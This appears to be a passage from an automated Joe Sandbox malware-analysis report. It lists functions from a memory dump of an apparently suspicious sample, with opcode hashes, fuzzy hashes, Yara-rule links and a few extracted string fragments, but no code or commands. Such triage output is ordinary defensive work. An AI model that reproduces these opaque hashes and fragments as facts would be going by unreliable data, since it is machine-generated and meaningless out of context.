                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f158dff495f0ca1b3ad0be2cd973265b94fc99d78ccc8444f14fd52262d7041c
                                                                                          • Instruction ID: aaa7a8771e475f038695cbcfbf330b538865055d60a6284cdcd947be38911f4e
                                                                                          • Opcode Fuzzy Hash: f158dff495f0ca1b3ad0be2cd973265b94fc99d78ccc8444f14fd52262d7041c
                                                                                          • Instruction Fuzzy Hash: A411FEB6D0121DAFCB00DFE9D9419EEBBF9FF88210F54416AE919E7204E7705A05CBA4
                                                                                          Function 0357F2FB Relevance: .1, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b5811ed46101696acd661fa091d3c241307178cb701c82dc741a64343b1bffc9
                                                                                          • Instruction ID: 0209b7cb9b0ebd247f784e6a933ff8511d75425f358c58527da04de70d4592c8
                                                                                          • Opcode Fuzzy Hash: b5811ed46101696acd661fa091d3c241307178cb701c82dc741a64343b1bffc9
                                                                                          • Instruction Fuzzy Hash: FA0184BAA002156BD710FB64EC49DFB737CEF84210F000295FD18AB255FA60AA514AE1
                                                                                          Function 0356148C Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1f9de2d277663f248dc475acfb00cfcf02e6efb23f6520d41dceba9b59ac42f
                                                                                          • Instruction ID: 0376c9f4bcbb9eb6ff32ae2b0ccca14302cd7c94318ae567842d4fece01f6041
                                                                                          • Opcode Fuzzy Hash: f1f9de2d277663f248dc475acfb00cfcf02e6efb23f6520d41dceba9b59ac42f
                                                                                          • Instruction Fuzzy Hash: AD111FB1C142299FCF10DFBDA8441EDBFF4FA09621B24865BE418E7250D37186418F94
                                                                                          Function 0358746B Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1078cefb9aaa29c0b5bad75ec64d2bd3bbd7b21b199b39d9232704d7552c12f7
                                                                                          • Instruction ID: e6eb70ed93f6ba4237ed5dfad1ea0648250ae798da1867f139241dced9e7798b
                                                                                          • Opcode Fuzzy Hash: 1078cefb9aaa29c0b5bad75ec64d2bd3bbd7b21b199b39d9232704d7552c12f7
                                                                                          • Instruction Fuzzy Hash: A601A2B2200509BFDB14DE89DC81EDB77ADAB8C710F404608BA09E7240D630E8518BA4
                                                                                          Function 03582F8B Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 727d3a0093ba4321d8851b568f704b62edd3b0433aedbe9f9b1c153f4653126b
                                                                                          • Instruction ID: 51743a00ede79f686815851e377f1414d9c23e61d8145937ad78a7cd4d406b40
                                                                                          • Opcode Fuzzy Hash: 727d3a0093ba4321d8851b568f704b62edd3b0433aedbe9f9b1c153f4653126b
                                                                                          • Instruction Fuzzy Hash: 630121B6C01219AFCB40DFE8D8409EEFBF9BB08200F14426EE815F7210F77056048BA0
                                                                                          Function 035615EB Relevance: .0, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 79bcb27519c128d4e76375048e9753d6dc2c823dbf14a78046b66cd312848e2c
                                                                                          • Instruction ID: 479ea9c6a731c69b89af07fab3888f7befa5ee74f5168a0ce76e60938d014691
                                                                                          • Opcode Fuzzy Hash: 79bcb27519c128d4e76375048e9753d6dc2c823dbf14a78046b66cd312848e2c
                                                                                          • Instruction Fuzzy Hash: 05F027B36042076BD710EA5DFC80B96F7ACFB84234F240632F91DCB251E672E41186E0
                                                                                          Function 0358667B Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90e61b65a2183d8b70b3c3e69f85a407500c9fc6efab18df22950531de081f07
                                                                                          • Instruction ID: 252e3e6f332ec6e75acd14b1523caa92c287b328928b413272dfaaee46e53906
                                                                                          • Opcode Fuzzy Hash: 90e61b65a2183d8b70b3c3e69f85a407500c9fc6efab18df22950531de081f07
                                                                                          • Instruction Fuzzy Hash: C6F05876200209BBD700EF88DC81EAB73ACEFC8610F004419FA19A7241C670B9118BB4
                                                                                          Function 0358738B Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 83e285552162d547b5f22e7a68ef2a5700ee52688da7e9c4a6e6ddded795aa6f
                                                                                          • Instruction ID: 130fab30a48591709a534977bc62b688b77b4ce0c9855190d83b1861223f5975
                                                                                          • Opcode Fuzzy Hash: 83e285552162d547b5f22e7a68ef2a5700ee52688da7e9c4a6e6ddded795aa6f
                                                                                          • Instruction Fuzzy Hash: D7E06D76200704BFD614EF98EC45E9B33ACEFC8710F404419F919AB242D630B9108AB4
                                                                                          Function 03575C2B Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 42030f2fe2bf68779df69c477925f43a6da38f8270e0870f8dcb97eb83245dcf
                                                                                          • Instruction ID: fe26017fe543ae9e535428298446b6a1967bed28349a60195743db7186606b7f
                                                                                          • Opcode Fuzzy Hash: 42030f2fe2bf68779df69c477925f43a6da38f8270e0870f8dcb97eb83245dcf
                                                                                          • Instruction Fuzzy Hash: 31F08271C05209EBDB14DFA4E881BDDBBB8EB04320F2087A9E8299B280E63497558781
                                                                                          Function 035891FB Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5da9e39a43b1e0a2ccfa1c1bce6c99ba25833764013f033c0867ff9f570509aa
                                                                                          • Instruction ID: 16c3108ce23adc82f55746073f86c96a1186cd58198f4fb7e7fb67f06e73619a
                                                                                          • Opcode Fuzzy Hash: 5da9e39a43b1e0a2ccfa1c1bce6c99ba25833764013f033c0867ff9f570509aa
                                                                                          • Instruction Fuzzy Hash: D4E04F36B4125437D620A689AC05FABB7ACDBC5A60F190064FE0DBB365E674A90142E5
                                                                                          Function 035615E5 Relevance: .0, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bddaa0ffb40852de9e80e7abaf945f5eb289c563d64bc004c8c1c9d15cfbfba
                                                                                          • Instruction ID: 7a4548ebb606490a4929735db1dface6cff1bbf1ad5c6762814cf2b8e738ea2a
                                                                                          • Opcode Fuzzy Hash: 5bddaa0ffb40852de9e80e7abaf945f5eb289c563d64bc004c8c1c9d15cfbfba
                                                                                          • Instruction Fuzzy Hash: D2E02637814112AE8B209A6DBC80C96FBACFA892303240322E85E97321D53184528BD0
                                                                                          Function 0358707B Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ef56e0d6ff410ec42d3ddcca9f09aa21b67c8698588f02a01d4b38a042423b04
                                                                                          • Instruction ID: bc8cd6da86ad9f1948a7986475a36c8db13b54298ad64dc7b15f2580d962eca2
                                                                                          • Opcode Fuzzy Hash: ef56e0d6ff410ec42d3ddcca9f09aa21b67c8698588f02a01d4b38a042423b04
                                                                                          • Instruction Fuzzy Hash: 92E08C36200624BBE220FB99EC41FDB776CEFC5710F404819FA0AAB241CA70BA0187B0
                                                                                          Function 035689FF Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e72f1ad88fc4afa59c0d82270a4891b8dfa541bc332939e6fc0790581653c10
                                                                                          • Instruction ID: 168c7e47ebf4fe1636420ecc89c275ef2532d943031d4363702507175e6d5dc9
                                                                                          • Opcode Fuzzy Hash: 0e72f1ad88fc4afa59c0d82270a4891b8dfa541bc332939e6fc0790581653c10
                                                                                          • Instruction Fuzzy Hash: C0900299100642624A72796066605571A5664C7B705D18964A5426F157579048611042

                                                                                          Non-executed Functions

                                                                                          Function 03578B0B Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                          • API String ID: 0-392141074
                                                                                          • Opcode ID: 6c72f3670abcc2f6934efae0050024f7d70e10341864383ca856a8af80c3a802
                                                                                          • Instruction ID: 7beff49d44639ff5e1c242233d2796349a65d61699fadcbefad4a1ec7a3818d1
                                                                                          • Opcode Fuzzy Hash: 6c72f3670abcc2f6934efae0050024f7d70e10341864383ca856a8af80c3a802
                                                                                          • Instruction Fuzzy Hash: AF714CB5C04318AADB25EBA4DC41FEFB77CBF88700F04459DE518AA194EB715B488FA1
                                                                                          Function 03577B1B Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                          • API String ID: 0-2877786613
                                                                                          • Opcode ID: 3f87dd6c05dc31fc7b8f992d551b4f34365588e1b976e96f828e374a347a8114
                                                                                          • Instruction ID: bd94f74d8e557890de34b159e49643f3b5b9230c933267b280f0f4f7c4b29f94
                                                                                          • Opcode Fuzzy Hash: 3f87dd6c05dc31fc7b8f992d551b4f34365588e1b976e96f828e374a347a8114
                                                                                          • Instruction Fuzzy Hash: C4415EB59556597EEB01EB90EC41FFF773CBFD5600F004048FA04BA2A4EB746A0987A6